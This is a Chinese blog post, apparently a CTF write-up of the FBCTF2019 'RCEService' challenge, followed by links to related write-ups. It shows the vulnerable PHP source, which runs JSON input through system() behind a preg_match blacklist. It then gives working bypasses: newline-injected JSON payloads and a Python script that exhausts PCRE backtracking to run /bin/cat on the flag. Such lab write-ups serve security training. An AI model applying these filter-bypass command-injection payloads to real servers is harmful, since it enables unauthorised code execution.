[FBCTF2019]RCEService 绕过preg_match

最新推荐文章于 2024-06-17 10:49:46 发布
最新推荐文章于 2024-06-17 10:49:46 发布
阅读量135 收藏
点赞数
分类专栏: BUUctf 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133303170
版权

确实第一次做想不到

dir啥的都扫不出来

因为 buu没有给源代码

所以完全搞不出来

只能去看看wp偷一个

<?php

putenv('PATH=/home/rceservice/jail');
设置环境变量为 该目录


if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
判断是不是字符串


    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } 

过滤

else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

 代码还是很简单的

主要是怎么做

思路

第一种解法

首先我们使用ls 看看 通过json格式

{"cmd":"ls"}

发现是ok的

那我们根据源代码 发现 该代码通过 preg_match过滤了很多

https://www.cnblogs.com/20175211lyz/p/12198258.html

但是是通过

/^.*(flag).*$/

 这种方式 我们直接通过换行绕过 %OA

{%0A"cmd":"ls /"%0A}

成功执行 我们现在看看 环境变量的目录下有什么

{%0A"cmd":"ls /home/rceservice"%0A}

发现存在了flag

我们怎么读取呢

我们首先去找到cat命令的绝对路径

/bin/cat

然后就可以读取了 因为开始设置了环境变量 所以不能直接使用cat

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

第二种解法

这道题都是围绕着我们如何绕过 preg_match过滤来进行的

我们可以通过 P神的 PRCE 来进行

因为preg_match 会进行回溯操作

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌

意思就是

preg_match 是按照顺序匹配的 .* 匹配所有 然后再 匹配下一个正则

.* 匹配完 就会发现是错误的 然后就开始回溯到正确的地方

但是回溯的次数是100万次

所以我们让他超过100万次

就可以造成无法回溯 绕过 preg_match
import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'

res = requests.post("http://8f81c713-85f8-45df-917f-0c923e3fea26.node4.buuoj.cn:81/", data={"cmd":payload})
print(res.text)

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php小经验:解析preg_match与preg_match_all 函数
10-27
本篇文章是对php中的preg_match函数与preg_match_all函数进行了详细的分析介绍,需要的朋友参考下
PHP 正则表达式之正则处理函数小结(preg_match,preg_match_all,preg_replace,preg_split)
12-19
在前面我们也说过,基于perl的正则表达式要快于POXIS正则表达式处理函数,所以我们只介绍以preg开头的基于perl的正则表达式。注意:在能偶使用字符串函数处理的时候,就不要使用正则表达式来处理字符串,因为字符串...
[FBCTF2019]Event
SopRomeo的博客
08-27 427
很明显要让我们伪造一个admin 开始看到这里以为是个xss,测试无果 注意他的cookie是三段式 那么这题的思路就是尝试篡改cookie来提权 有一个思路 利用SSTI模板注入 获取秘钥,然后重新生成签名cookie 测试模板注入 最终发现 event_important存在模板注入 尝试模板注入测试 具体过程如下 https://xz.aliyun.com/t/5399#toc-1 ...
FBCTF2019-RCEService
anwen12的博客
02-26 223
0x01 题目初现 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|bui
BUUCTF:[FBCTF2019]Event
末初的CSDN博客
07-29 847
题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event 模版注入+Cookie伪造 Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU 加密方式未知,密钥未知 在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显 接着查找配置文件:__class__.__init__.__globals__[app].config 发现密钥,开始
NO.3-9 [FBCTF2019]RCEService
nigo134的博客
08-06 273
题目叫我们以JSON的格式提交命令,先随便输 提交JSON格式 ?cmd={"cmd":"ls"} 但是经测试发现很多命令被禁止了 在网上找到的源码2333: <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt de...
preg-match绕过
05-19
为了避免绕过 preg_match 函数的功能限制,通常可以采取以下措施: 过滤用户输入:在将用户输入作为正则表达式模式使用之前,应该对其进行过滤和验证,确保用户输入符合预期,避免恶意输入绕过验证。 限制可接受的...
php使用preg_match()函数验证ip地址的方法
12-19
preg_match('/^(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)(?:[.](?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)){3}$/', $ipAddress); 代码二、 <?php /* *@return Boolen *@param String $ip 要匹配的ip地址 *@param ...
FacebookCTF2019 web writeup
river
06-05 3284
facebookCTF2019 rceservice - 绕过preg_match http://challenges.fbctf.com:8085 We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only l...
[FBCTF2019]RCEService
pakho_C的博客
09-04 533
见上图,可见第4步的时候,因为第一个.*可以匹配任何字符,所以最终匹配到了输入串的结尾,也就是//aaaaa。,14步匹配.*,第二个.*匹配到了字符串末尾,最后结束匹配。系统命令需要有特定的环境变量的也就是路径,系统找不到该路径下的exe文件怎么执行系统命令,因此这个地方查阅资料后发现只能调用绝对路径下的命令,cat命令就在/bin/目录下面。所以NFA就开始回溯,先吐出一个a,输入变成第5步显示的//aaaa,但仍然匹配不上正则,继续吐出a,变成//aaa,仍然匹配不上……,假设匹配的输入是
BUUCTF [FBCTF2019] Products Manager
Senimo
01-08 1379
BUUCTF [FBCTF2019] Products Manager 考点: 启动环境: 产品管理,其中有三个功能: 查看前5的产品 添加产品 查看产品细节 知道了大致功能,尝试正常的业务逻辑,首先添加产品,其Secret值需包含10位以上的大小写字母和数字: 添加成功,查询产品细节: 分析题目给出的源码: 其中footer.php页面没用,header.php页面只是首页的三个跳转链接,index.php页面也没有可利用内容。 在db.php页面中,查看到如下SQL语句: CREATE
BUUCTF WEBRCESERVICE
qq_41696858的博客
03-02 522
首先这题没源码是万万做不出来的,反正我是不知道这源码从哪来的 先上源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/
BUUCTF:[FBCTF2019]RCEService
../../../../../../../
06-23 645
打开界面 可以看见提示说要用JSON格式输入cmd中 先尝试一下 {"cmd":"ls"} 出现一个index.php文件 但是获取不到,题目也没有其他信息,然后发现原本题目是提供了源码的,去网上找了找 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacki
BUUCTF:[FBCTF2019]RCEService
末初的CSDN博客
03-28 1815
题目叫我们以JSON的格式提交命令,先随便输 提交JSON格式 ?cmd={"cmd":"ls"} 但是经测试发现很多命令被禁止了 在网上找到的源码2333: <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!...
深入解析PHP函数
最新发布
NatLindsay的博客
06-17 288
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
preg_match异或绕过
06-10
在某些情况下,我们可能需要绕过某些限制或过滤,这时可以使用异或运算符(^)来绕过。 例如,有时候我们需要匹配一个字符串中的数字,但是字符串中可能包含一些其他字符,如果直接使用 preg_match 可能会匹配到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值